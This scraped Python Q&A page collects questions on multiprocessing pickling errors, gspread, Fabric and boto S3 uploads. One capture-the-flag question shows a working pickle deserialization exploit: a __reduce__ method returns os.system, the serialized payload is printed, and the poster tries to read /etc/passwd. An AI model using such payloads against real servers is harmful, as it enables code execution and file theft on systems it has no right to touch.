Can't pickle local object

Can't pickle local object - python

I would like to use multiprocess package for example in this code.
I've tried to call the function create_new_population and distribute the data to 8 processors, but when I do I get pickle error.
Normally the function would run like this: self.create_new_population(self.pop_size)
I try to distribute the work like this:
f= self.create_new_population
pop = self.pop_size/8
self.current_generation = [pool.apply_async(f, pop) for _ in range(8)]
I get Can't pickle local object 'exhaust.__init__.<locals>.tour_select'
or PermissionError: [WinError 5] Access is denied
I've read this thread carefully and also tried to bypass the error using an approach from Steven Bethard to allow method pickling/unpickling via copyreg:
def _pickle_method(method)
def _unpickle_method(func_name, obj, cls)
I also tried to use pathos package without any luck.
I've know that the code should be called under if __name__ == '__main__': block, but I would like to know if this can be done with minimum possible changes in the code.

Related

Python - Multiprocessing suddenly getting stuck, although code is correct

I´ve spent the last few hours on the multiprocessing tool in python. Last thing I did was to set up a Pool with a few workers to execute a function. Everything was doing fine and multiprocessing was working.
After I switched to another file to implement my multiprocessing insights in my actual project, the code was running, but the .get() invocation following the apply_async(func, args) never returned anything.
I thought it was due to a false implementation, but turned out to be something else. I went back to the first file where I did my experiments and tried to run this one again. Suddenly also here multiprocessing didn´t work anymore. Apart from trying to implement the multiprocessing in my project I didn´t really do anything else on the code or the environment. The only thing maybe correlated to the problem is that I tried to execute an older version of the __main__ program in the same environment, leading to an error because the __main__ file took to newer project files to execute.
Here´s the code I used for the simple experiment:
import torch.multiprocessing as mp
import torch
import time
*#thats code from my project*
import data.preprocessor as preprocessor
import eco_neat_t1_cfg as cfg
def f(x):
return x*x
if __name__ == "__main__":
p = mp.Pool(1)
j = p.apply_async(f, (5,))
r = j.get(timeout=10)
print(r)
So nothing to complicated here, it should actually work.
However, there is no result being returned. I notice the CPU is working according to the number of processes invoked, so I assume it is caught in some kind of loop.
I am running on Win10, with Python running over Anaconda Spyder with the IPython Console.
When I close Spyder and all Python processes, restart and execute it again it works, but only if I am not importing my own code. Once I import the eco_neat_t1_cfg as cfg, which is basically only a dataclass with a few other imports, the program wont return anything and gets stuck in the execution.
I am getting a Reloaded modules: data, data.preprocessor, data.generator error. This is probably because cfg also imports data.preprocessor. The weird thing is, if I now delete all imports from the source code, save the file and run it, it will work again, although the imports are not even specified in the code anymore... however, every time I restart Python and Spyder I need to specify the modules again ofc.
Also, the simple code is working after deletion of all imports, but the more complicated I actually want to execute is not, although it was perfectly fine before all this happened. Now I am getting a PicklingError: Can't pickle <class 'neat.genotype.genome.Pickleable_Genome'>: it's not the same object as neat.genotype.genome.Pickleable_Genome error. As I said, there were no problems with the pickling before. That´s the "more complicated" piece of code I pass to apply_async.
def create_net(genome):
net = feedforward.Net("cpu", genome, 1.0)
inp = torch.ones(2, 5)
input = torch.FloatTensor(inp).view(1, -1).squeeze()
res = net(input)
return res
What I did was to delete all pycache in my project, also reset Spyder settings and update Anaconda and Spyder. Also I tried to look at every piece of code of the cfg file, but even if I delete every line, also no imports, the program will not work. Nothing helps, I really don´t have any idea of what´s the problem and how to solve it. Maybe one of you has an idea.
One more thing to say, if I manually interrupt (CTRL + C) the execution, in the stacktrace I noticed the processes to be waiting.
File "C:/Users/klein/Desktop/bak/test/eco_neat_t1/blabla.py", line 72, in <module>
r = j.get(timeout=10)
File "C:\Users\klein\Anaconda3\envs\eco_neat\lib\multiprocessi\pool.py", line 651, in get
self.wait(timeout)
File "C:\Users\klein\Anaconda3\envs\eco_neat\lib\multiprocessing\pool.py", line 648, in wait
self._event.wait(timeout)
File "C:\Users\klein\Anaconda3\envs\eco_neat\lib\threading.py", line 552, in wait
signaled = self._cond.wait(timeout)
Cheers
SOLUTION: The bug was my directory structure that somehow led python to fail. I had both of my __main__ test files running in the root/tests/eco_neat_t1 directory. I two new files t1_cfg and t1 with the same content in the root directory. Suddenly everthing works fine...weird world

Serialization not working with cPickle

Im trying to perform a cPickle deserialization for a CTF. Im working on an exploit for a deserialization vuln, trying to generate a python class that will run a command on a server when deserialized, following this example: https://lincolnloop.com/blog/playing-pickle-security/
import os
import cPickle
# Exploit that we want the target to unpickle
class Exploit(object):
def __reduce__(self):
return (os.system, ('ls',))
shellcode = cPickle.dumps(Exploit())
print shellcode
The thing is that the server I'm trying to exploit doesn't have the "os" or the "subprocess" modules included, so I'm not able to run shell commands. I'm trying to read local files with objects generated with the following code:
class Exploit(object):
def __reduce__(self):
data = open("/etc/passwd", "rb").read()
return data
shellcode = cPickle.dumps(Exploit()) print shellcode
but when i try to run it to generate the payload, it tries to read my local /etc/passwd file and fails with the error message:
shellcode = cPickle.dumps(Exploit())
cPickle.PicklingError: Can't pickle <main.Exploit object at
0x7f14ef4b39d0>: attribute lookup main.root:x:0:0:root:/root:/b
in/sh (/etc/passwd continues)
When I run the first example, it generates the following pickle succesfully (and doesnt try to do an ls on my machine):
cposix
system
p1
(S'ls'
p2
tp3
Rp4
.
So why is it not working with my code?

"Whenever you try to pickle an object, there will be some properties that may not serialize well. For instance, an open file handle In this cases, pickle won't know how to handle the object and will throw an error."
What's the exact usage of __reduce__ in Pickler

Multiprocessing - returning unpickleable objects?

I've actually asked a question about multiprocessing before, but now I'm running in to a weird shortcoming with the type of data that gets returned.
I'm using Gspread to interface with Google's Sheets API and get a "worksheet" object back.
This object, or an aspect of this object, is apparently incompatible with multiprocessing due to being "unpickle-able". Please see output:
File "/usr/lib64/python2.7/multiprocessing/pool.py", line 554, in get
raise self._value
multiprocessing.pool.MaybeEncodingError: Error sending result: '[<Worksheet 'Activation Log' id:o12345wm>]'.
Reason: 'UnpickleableError(<ssl.SSLContext object at 0x1e4be30>,)'
The code I'm using is essentially:
from multiprocessing import pool
from oauth2client.client import SignedJwtAssertionCredentials
import gspread
sheet = 1
pool = multiprocessing.pool.Pool(1)
p = pool.apply_async(get_a_worksheet, args=(sheet,))
worksheet = p.get()
And the script fails while attempting to "get" the results. The get_a_worksheet function returns a Gspread worksheet object that allows me to manipulate the remote sheet. Being able to upload changes to the document is important here - I'm not just trying to reference data, I need to alter it as well.
Does anyone know how I can run a subprocess in a separate and monitorable thread, and get an arbitrary (or custom) object type safely out of it at the end? Does anyone know what makes the ssl.SSLContext object special and "unpickleable"?
Thanks all in advance.

Multiprocessing uses pickling to pass objects between processes. So I do not believe you can use multiprocessing and make an object unpicklable.

I ended up writing a solution around this shortcoming by having the sub-process simply perform the necessary work inside itself rather than return a Worksheet object.
What I ended up with was about half a dozen function and multiprocessing function pairs, each one written to do what I needed done, but inside of a sub-process so that it could be monitored and timed.
A hierarchical map would look something like:
Main()
check_spreadsheet_for_a_string()
check_spreadsheet_for_a_string_worker()
get_hash_of_spreadsheet()
get_hash_of_spreadsheet_worker()
... etc
Where the "worker" functions are the functions called in the multiprocessing setup, and the regular functions above them manage the sub-process and time it to make sure the overall program doesn't halt if the call to gspread internals hangs or takes too long.

Python Fabric as a Library, execute and environments?

I've tried really hard to find this but no luck - I'm sure it's possible I just can't find and example or figure out the syntax for myself
I want to use fabric as a library
I want 2 sets of hosts
I want to reuse the same functions for these different sets of hosts (and so cannot us the #roles decorator on said functions)
So I think I need:
from fabric.api import execute, run, env
NODES = ['192.168.56.141','192.168.56.152']
env.roledefs = {'head':['localhost'], 'nodes':NODES}
env.user('r4space')
def testfunc ():
run('touch ./fred.txt')
execute(testfunc(),<somehow specific 'head' or 'nodes' as my hosts list and user >)
I've tried a whole range of syntax // hosts=NODES, -H NODES, user='r4space'....much more but I either get a syntax error or "host_string = raw_input("No hosts found. Please specify (single)""
If it makes a difference, ultimately my function defs would be in a separate file that I import into main where hosts etc are defined and execute is called.
Thanks for any help!

You have some errors in your code.
env.user('r4space') is wrong. Should be env.user = 'r4space'
When you use execute, the first parameter should be a callable. You have used the return value of the function testfunc.
I think if you fix the last line, it will work:
execute(testfunc, hosts = NODES)

boto throwing an Content-MD5 error sometimes

So I basically wrote a function to upload a file to S3 using the key.set_contents_from_file() function but I'm finding it sometimes throws this error
<Error>
<Code>BadDigest</Code>
<Message>The Content-MD5 you specified did not match what we received.</Message>
<ExpectedDigest>TPCms2v7Hu43d+yoJHbBIw==</ExpectedDigest>
<CalculatedDigest>QSdeCsURt0oOlL3NxxGwbA==</CalculatedDigest>
<RequestId>2F0D40F29AA6DC94</RequestId><HostId>k0AC6vaV+Ip8K6kD0F4fkbdS13UdxoJ3X1M76zFUR/ZQgnIxlGJrAJ8BeQlKQ4m6</HostId></Error>
The function:
def uploadToS3(filepath, keyPath, version):
bucket = connectToS3() # Simple gets my bucket and returns it
key = Key(bucket)
f = open(filepath,'r')
key.name = keyPath
key.set_metadata('version', version)
key.set_contents_from_file(f) # offending line
key.make_public()
key.close()
If I open a python shell and manually call it, it works without a hitch, however the way I have to handle it (in which it doesn't work) involves calling it from a subprocess. This is because the caller is a python3 script, 2to3 didn't work and I didn't want to deal with the various years old branches for python3 versions.
Anyway, that seems to actually run it correctly as it gets in the function, the inputs are what's expected (I had them print out), but the # offending line keeps throwing this error. I have no idea what the cause is.
Is it possible bucket isn't being set properly? I feel like if that were the case calling Key(bucket) would have thrown an error
So I essentially run the below script, once as a subprocess called from a python3 script, the other from the console
sudo -u www-data python botoUtilities.py uploadToS3 /path/to/file /key/path
I have this logic inside to pass it to the correct function
func=None
args=[]
for arg in sys.argv[1:]:
if not func:
g = globals()
func = g[arg]
else:
if arg=='True':
args.append(True)
elif arg=='False':
args.append(False)
else:
args.append(arg)
if func:
wrapper(func, args)
It runs in both cases (I write to a file to print out the args) but only in the console case does it not get the error. This is incredibly frustrating. I can't figure out what is done differently. All I know is that it's not possible to send data to S3 using boto run from a subprocess

Develop Reference

Python is a programming language that lets you work quickly and integrate systems more effectively.

Can't pickle local object - python

Related

Python - Multiprocessing suddenly getting stuck, although code is correct

Serialization not working with cPickle

Multiprocessing - returning unpickleable objects?

Python Fabric as a Library, execute and environments?

boto throwing an Content-MD5 error sometimes

Categories

Resources